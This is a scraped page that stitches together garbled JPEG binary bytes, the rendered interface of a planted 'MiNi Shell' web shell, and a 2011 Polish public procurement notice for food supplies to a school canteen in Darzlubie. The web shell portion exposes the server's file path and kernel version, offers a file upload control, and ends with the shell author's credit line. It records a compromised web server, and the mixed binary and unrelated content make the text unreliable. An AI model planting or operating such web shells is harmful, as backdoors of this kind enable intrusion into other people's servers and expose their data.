JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111122/303931-N-2011.html

<p class="kh_header"><b>Puck: Zakup i dostawy artykułów żywnościowych</b><br>
<b>Numer ogłoszenia: 303931 - 2011; data zamieszczenia: 22.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół im. Maksymiliana Wilandta w Darzlubiu , Darzlubie, ul. Pucka 74, 84-100 Puck, woj. pomorskie, tel. 0-58 673 82 92.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zespół Szkół.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawy artykułów żywnościowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawy artykułów żywnościowych do stołówki szkolnej Zespołu Szkół im. Maksymiliana Wilandta w Darzlubiu.
Szczegółowy opis przedmiotu zamówienia zamieszczony jest w Formularzach Cenowych stanowiących Załączniki nr 2.1 - 2.10 do SIWZ.

Zamawiający dopuszcza składanie ofert częściowych w następujących pakietach: 

Pakiet nr 1 - Warzywa,		
Pakiet nr 2 - Nabiał,			
Pakiet nr 3 - Produkty suche,	
Pakiet nr 4 - Mięso i wędliny,
Pakiet nr 5 - Drób,			
Pakiet nr 6 - Mrożonki,	
Pakiet nr 7 - Pieczywo,		
Pakiet nr 8 - Ciastka i ciasta,		
Pakiet nr 9 - Ryby,			
Pakiet nr 10 - Ziemniaki		

Zamawiający dopuszcza składanie ofert częściowych na dowolną ilość pakietów. Zamawiający zastrzega jednak składanie ofert przez Wykonawcę na całość asortymentu w danym pakiecie.

Zamawiający zastrzega sobie prawo do niewykorzystania pełnego limitu ilościowego przedmiotu zamówienia. Z tego tytułu nie będą przysługiwały Wykonawcy żadne roszczenia poza roszczeniem 
o zapłatę za już dostarczony towar..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.80.00.00-6, 15.13.14.10-2, 15.11.40.00-0, 15.41.21.00-0, 15.13.14.00-9, 15.11.11.00-0, 15.13.11.30-5, 15.11.21.30-6, 15.11.21.20-3, 15.13.11.35-0, 15.11.23.00-9, 15.33.11.70-9, 15.33.21.00-5, 15.81.00.00-9, 15.21.00.00-3, 15.23.50.00-4, 15.31.00.00-4, 15.30.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W związku  z art. 144 Ustawy PZP ustala się następujące przesłanki i okoliczności jakie muszą być 
spełnione w przypadku zmiany postanowień zawartej umowy na wykonanie zadania: 
1)	nastąpią przekształcenia własnościowe,
2)	nastąpią zmiany techniczne lub organizacyjne,
3)	nastąpią zmiany adresu,
4)	zmianie ulega wielkość opakowań,
5)	nastąpi zakończenie, wstrzymanie lub wycofanie artykułów z produkcji,
6)	zmianie ulega harmonogram dostaw co do ilości i terminów,
7)	działanie siły wyższej (strajki generalne lub lokalne), mające bezpośredni wpływ na terminowość zamówień,
8)	wystąpienia innych okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo  zachowania należytej staranności,
Warunki dokonywania zmian: 
1)	inicjowanie zmian może nastąpić na wniosek wykonawcy i zamawiającego, 
2)	uzasadnienie zmian  -  prawidłowa realizacja umowy, obniżenie kosztów,
3)	zmiany umowy dokonuje się w  formie pisemnego aneksu do umowy pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.darzlubuie.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół im. Maksymiliana Wilandta w Darzlubiu
ul. Pucka 74
84-100 Puck
Sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.12.2011 godzina 09:45, miejsce: Zespół Szkół im. Maksymiliana Wilandta w Darzlubiu
ul. Pucka 74
84-100 Puck
Sekretariat Szkoły.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Warzywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> MARCHEW		200 KG;
KALAFIOR	150 SZT;
PIETRUSZKA NAĆ	p	250 SZT;
CEBULA BIAŁA 		100 KG;
CZOSNEK		20 GŁ;
KOPER		130 P;
SZCZYPIOR		100 P;
POR	70 KG;
BURACZKI		250 KG;
BRUKSELKA		40 KG;
BIAŁA RZODKIEW		40 KG;
RZODKIEWKA		50 P;
PAPRYKA CZERWONA	50KG;
PAPRYKA ZÓŁTA		20KG;
PAPRYKA ZIELONA		20KG;
PAPRYKA  POMARAŃCZOWA		20 KG;
KAPUSTA BIAŁA	370 KG;
KAPUSTA CZERWONA		140 KG;
KAPUSTA WŁOSKA		95 KG;
SAŁATA LODOWA	60 SZT;
OGÓREK SWIEŻY 		120 KG;
OGÓREK KISZONY		240KG;
OGÓREK MAŁOSOLNY	30 SZT po 3KG;
FASOLA JAŚ		90 KG;
FASOLA DROBNA		50 KG;
JABŁKA	250 KG;
GRUSZKA		50 kg;
ŚLIWKA WĘGIERKA	30 kg;
ANANAS PUSZKA MAŁA	10 SZT/ 565 G;
BANAN	100 KG;
CYTRYNA 	20 KG;
ŚLIWA DUŻA		200 SZT;
NEKTARYNKA		200 SZT;
BRZOSKWINIA		200  SZT;
POMARAŃCZA	150 KG;
MANDARYNKA	100 KG;
PIECZARKI		50 KG;
TRUSKAWKI		100 kg;
POMIDORY		30 KG;
WIŚNIE ŚWIEŻE		25 KG;
SELER		170 KG;
KAPUSTA PEKIŃSKA		140 KG;
BOTWINKA		60 P;
FASOLKA SZPARAGOWA ZIELONA		100 KG;
KAPUSTA KISZONA		200 KG;
KAPUSTA BIAŁA		100 SZT;
KAPUSTA CZERWONA 		50 SZT;
KAPUSTA  PEKIŃSKA		80 SZT.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> JAJA		6500 SZT;
MARGARYNA 	120 SZT;
PALMA	50 SZT;
MASŁO OSEŁKA GÓRSKA 500g	szt.	20 SZT;
MASŁO SMIETANKOWE 200g	szt.	30 SZT;
MASŁO WARLUBIE 200g	szt.	30 SZT;
MASŁO MIX PASŁEDZKI 200g	szt.	50 SZT;
MLEKO 3/2 % ;
karton 1 litr	 220 L;
MAŚLANKA MRĄGOWSKA 
karton 1 litr	100 L;
MAŚLANKA TRUSKAWKOWA karton 1 litr 		100 L;
ŚMIETANA 12% 
karton 0,5 litra	80 SZT;

ŚMIETANA 18%
karton 0,5 litra	50 SZT;

ŚMIETANA 30%
karton 0,5 litra		50 SZT;
ŚMIETANA RAMA 36%
karton 1 litr	100 SZT;
TWARÓG CHUDY	40 KG;
TWARÓG MIELONY 
wiadro po 1 kg - 60 KG;
OLEJ po 5 litrów	szt.	30 SZT;
OLEJ po 3 litry	80 SZT;
OLIWA Z OLIWEK
po 1 litrze	10 SZT;
JOGURTY NATURALNY po 900 g		30 SZT;
JOGURTY MAŁE  RÓŻNE SMAKI 		680 SZT;
JAGURTU BAKOMA 	400 SZT;
JOGURTY DANON		400 SZT;
BUDYŃ SERDUSZKO	510 SZT;
SOS MAJONEZOWY
po 3 litry	35 SZT;
SER ŻÓŁTY EDEMSKI SALAMI	10 KG;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Produkty suche.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CUKIER	100 KG;	 
CUKIER WANILIOWY	150SZT	;
CYNAMON	10SZT	 ;
CUKIER PUDER	10 KG	;
DROŻDŻE	20 SZT	PO- 100 G;
DŻEM WIADRO RÓZNE SMAKI	10 W 	PO- 1 KG;
KISIEL	210 SZT	 ;
MAKARON ŚWIDERKI	80 KG	; 
MAKARON KOKARDKA	50 KG	;
MAKARON MUSZELKA	100 KG	 ;
MAKARON KOLANKA	80 KG;	
M ĄKA PSZANNA	50 KG	PO - 1KG;
MĄKA TORTOWA	20 KG	PO - 1KG;
MAKA WROCŁAWSKA	30 KG	PO- 1KG;
MĄKA POZNAŃSKA	20 KG	PO- 1KG;
MĄKA ZIEMNIACZANA	20 KG	PO - 1KG;
OCET SPIRYTUSOWY	15 SZT	PO- 1L;
MAGII 	20 SZT	PO- 960ml;
PRZYPRAWA WARZYWKO	30 SZT	PO - 1KG;
PRZYPRAWA KUCHAREK	20 SZT	PO - 1KG;
FIX DO SZPAGETTI PO BOL. W PROSZKU	80 SZT;	
GROSZEK KON. PUSZKA	20 SZT	PO- 2 .6KG;
GROCH ŁUSKANY	90 KG	 ;
KWASEK CYTRYNOWY	2 KG	;
KONCENTRAT POM. W PUSZ.	25 SZT	PO-4,550ML;
KONCENTRAT POM. W PUSZ.	10 SZT	PO-878 G;
KASZA JĘCZMIENNA	30 SZT	PO-900 G;
KASZA PECZAK BIAŁA	200 SZT	PO-500G;
KASZA GRYCZANA 	50 KG	; 
KONCENTRAT DO BARSZCZU	30 SZT;	
MUSZT.ARDA SAREPSKA	20 SZT	PO- 200 G;
KETCHUP ŁAGODNY WŁOCŁAWEK	40 SZT	PO- 1L;
KETCHUP PIKANTNY	40 SZT	PO- 1L;
KUKURYDZA PUSZKA 	10 SZT	PO-2,600 KG;
KUKURYDZA PUSZKA	40 SZT	MAŁA;
CHRZAN W SŁOIKU	15 SZT	MAŁY;
ZIARENKO SMAKU	20SZT	PO- 1KG;
PRZY. DO DROBIU DELIKAT	15 SZT	PO-600 G;
PRZYP. DO MIES DELIKAT	15 SZT	PO-700 G;
PRZYP. PAPRYKA SŁODKA	15 SZT	PO- 700 G;
PRZYP. DO SAŁATEK SOS OGRODOWY KAMIS	20 SZT;	
PIEPRZ CZARNY MIELONY	10 SZT	PO-0,800 G;
PIEPRZ BIAŁY	5 SZT	PO-0,800 G;
LISCIE LAUROWE	2 SZT	PO- 100 G;
ZIELE ANGIELSKIE	2 SZT 	PO-100G;
SOS DO PIECZENI CIEMNY	10 SZT	PO- 1,2 KG;
SOS DO PIECZENI JASNY	10 SZT	PO-1,2 KG;
SOS GRZYBOWY	5 SZT	PO- 1KG;
MAJERANEK	40 SZT	PO- 150 G;
PRZYP. OREGANO	10 SZT	PO- 10 G;
PRZYP. BAZYLIA	30 SZT	PO-10 G;
ZIOŁA PROWANSALSKIE	20 SZT	PO- 10 G;
PROSZEK DO PIECZANIA	30 SZT	PO- 10 G;
RYŻ	130 KG	PO- 1 KG;
RODZYNKI	10 KG	 ;
ŚLIWKA KALIFORNIJSKA	15 SZT	PO-100 G;
SÓL	130 KG	PO-1KG;
SYROPY POMARAŃCZOWY	20 SZT	PO-5L;
SYROP TRUSKAWKA	30 SZT	PO- 5L;
SYROP WISNIA	30 SZT	PO-5L;
SYROP RÓZNE SMAKI	30 SZT	PO -5L;
ŻUR W BUTELCE	75 L	PO- 1L;
KAKAO CIEMNE	5 SZT	PO- 250 G;
KURKUMA	5 SZT	PO- 10 G;
GALARETK  RÓŻNE SMAKI	100 SZT	; 
SOS SŁODKO KWAŚNY SŁOIK	200 SZT	PO - 460 G;
PRZYPRAWA DO KURCZAKA	60 SZT	;
KMINEK	5 SZT     	PO-15 G;
WEGETTA	20 SZT	PO-1KG;
CZOSNEK GRANULOWANY	30 SZT;	
SOS OGRODOWY KNORR	10 SZT	PO-1KG ;
PRZYPRAWA DO RYB	20 SZT	 ;
FASOLKA KONSER. CZER.	10 SZT;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Mięso i wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> SCHAB B/K	kg	190;
ŁOPATKA B/K	kg	420;
BOCZEK ŚWIEŻY	kg	80;
BOCZEK WEDZONY	kg	50;
GOLONKA	kg	40;
ŻEBERKA	kg	75;
KOŚCI WIEPRZOWE	kg	40;
PACHWINA WEDZONA	kg	60;
MIELONE	kg	350;
MIESO GULASZOWE	kg	200;
KARKOWKA Z/ K	kg	50;
KARKÓWKA B/K	kg	50;
SMALEC	kg	150;
SZYNKA KULKA	kg	200;
KIEŁBASA ZWYCZAJNA	kg	140;
KIEŁBASA BIAŁA	kg	70;
ŚLĄSKA 	kg	 100;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.14.10-2, 15.11.40.00-0, 15.41.21.00-0, 15.13.14.00-9, 15.11.11.00-0, 15.13.11.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> FILET Z KURCZAKA	kg	300 ;
ĆWIARTKA Z KURCZAKA	kg	150 ;
KORPUSY DROBIOWE	kg	30;
KURCZAK CAŁY	kg	20 ;
UDKO	kg	100 ;
SKRZYDEŁKO Z KURCZAKA	kg	50; 
MIELONE DROBIOWE	kg	100 ;
PIEROGI Z MIĘSEM VIRTU	kg	150; 
PIEROGI Z KAPU I GRZ. VIRTU	kg	150 ;
KOPYTKA VIRTU	kg	150 ;
PIEROGI Z TRUS. VIRTU	kg	150 ;
PIEROGI Z SEREM VIRTU	kg	100 ;
BIODERKO KURCZAKA	kg	300 ;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.21.30-6, 15.11.21.20-3, 15.13.11.35-0, 15.11.23.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PIEROGI Z MIĘSEM	kg	150;
PIEROGI Z KAP I GRZYBAMI	kg	100; 
PIEROGI Z SEREM	kg	100 ;
FASOLKA SZPARAGOWA	kg	250 ;
MARCHEWKA KOSTKA	kg	250 ;
WŁOSZCZYZNA 	kg	150 ;
ZUPA 7 SKŁADNIKOWA	kg	100 ;
FRYTKI	kg	600 ;
TRUSKAWKI MROZONE	kg	150; 
KUKURYDZA	kg	50 ;
MAJONEZ  WIADRO- WINIARY po 3 kg	- szt.	20 ;
KALAFIOR MROŻONY	kg	100 ;
GROSZEK MROŻONY ZIELONY	kg	50 ;
KNEDLE RÓZNE SMAKI	kg	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9, 15.33.21.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CHLEB ZWYKŁY KROJONY	szt.	500 ;
BUŁKA KAJZERKA	szt.	800;
BUŁKA MAŚLANA	szt.	340 ;
BUŁKA Z SEREM	szt.	180 ;
BUŁKA TARTA	kg	145.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Ciasta i ciastka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> DROŻDŻÓWKA	szt.	340;
DROŻDŻÓWKA Z SEREM	szt.	340;
DROŻDŻÓWKA Z MAKIEM	szt.	340;
DROŻDŻÓWKA Z BUDYNIEM	szt.	340;
PASZTECIK Z KAPUSTĄ I GRZYBAMI	szt.	400;
PĄCZEK	szt.	400;
CIASTKO FRANCUSKIE	szt.	180;
CIASTO  MURZYNEK	kg	50;
CIASTO MIODOWNIK	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> FILET Z PANGI	kg	80;
FILET Z DORSZA	kg	130;
PŁATY ŚLEDZIOWE MARYNOWANE W ZALEWIE OCTOWEJ po 4 kg	szt	35.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.21.00.00-3, 15.23.50.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Ziemniaki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZIEMNIAKI 	kg	6000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.31.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com